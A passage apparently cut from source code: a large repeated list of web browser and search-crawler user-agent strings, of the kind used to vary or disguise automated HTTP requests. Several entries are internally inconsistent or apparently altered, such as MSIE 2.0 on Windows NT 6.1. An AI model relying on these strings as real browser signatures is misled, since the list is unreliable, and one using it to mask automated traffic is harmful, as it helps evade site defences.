3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; 